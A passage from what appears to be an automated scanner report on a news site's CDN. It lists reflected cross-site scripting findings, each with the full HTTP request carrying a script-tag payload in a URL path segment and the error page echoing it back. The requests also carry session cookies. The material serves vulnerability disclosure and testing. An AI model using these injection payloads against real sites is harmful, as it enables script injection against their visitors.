<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal94a89<script>alert(1)</script>34c114d8f35/nypost/scripts/jquery.liscroll.nyp.js</p>
...[SNIP]...

1.98. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aac60<script>alert(1)</script>2cc6027c1ac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostaac60<script>alert(1)</script>2cc6027c1ac/scripts/jquery.liscroll.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:05 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostaac60<script>alert(1)</script>2cc6027c1ac/scripts/jquery.liscroll.nyp.js</p>
...[SNIP]...

1.99. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 738f1<script>alert(1)</script>0555ca423b7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts738f1<script>alert(1)</script>0555ca423b7/jquery.liscroll.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:13 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts738f1<script>alert(1)</script>0555ca423b7/jquery.liscroll.nyp.js</p>
...[SNIP]...

1.100. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 443c2<script>alert(1)</script>87d16a57803 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js443c2<script>alert(1)</script>87d16a57803 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:21 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js443c2<script>alert(1)</script>87d16a57803</p>
...[SNIP]...

1.101. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35f07<script>alert(1)</script>1a0e0870c6e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig35f07<script>alert(1)</script>1a0e0870c6e/WebPortal/nypost/scripts/jquery1.3.1.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:59 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig35f07<script>alert(1)</script>1a0e0870c6e/WebPortal/nypost/scripts/jquery1.3.1.js</p>
...[SNIP]...

1.102. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 96dc5<script>alert(1)</script>a652abc5f3b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal96dc5<script>alert(1)</script>a652abc5f3b/nypost/scripts/jquery1.3.1.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:08 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal96dc5<script>alert(1)</script>a652abc5f3b/nypost/scripts/jquery1.3.1.js</p>
...[SNIP]...

1.103. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a68be<script>alert(1)</script>52b89e86413 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nyposta68be<script>alert(1)</script>52b89e86413/scripts/jquery1.3.1.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:15 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nyposta68be<script>alert(1)</script>52b89e86413/scripts/jquery1.3.1.js</p>
...[SNIP]...

1.104. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c3358<script>alert(1)</script>f25f0682a3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scriptsc3358<script>alert(1)</script>f25f0682a3/jquery1.3.1.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 707
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:21 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scriptsc3358<script>alert(1)</script>f25f0682a3/jquery1.3.1.js</p>
...[SNIP]...

1.105. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5eded<script>alert(1)</script>3518e1143da was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js5eded<script>alert(1)</script>3518e1143da HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:28 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js5eded<script>alert(1)</script>3518e1143da</p>
...[SNIP]...
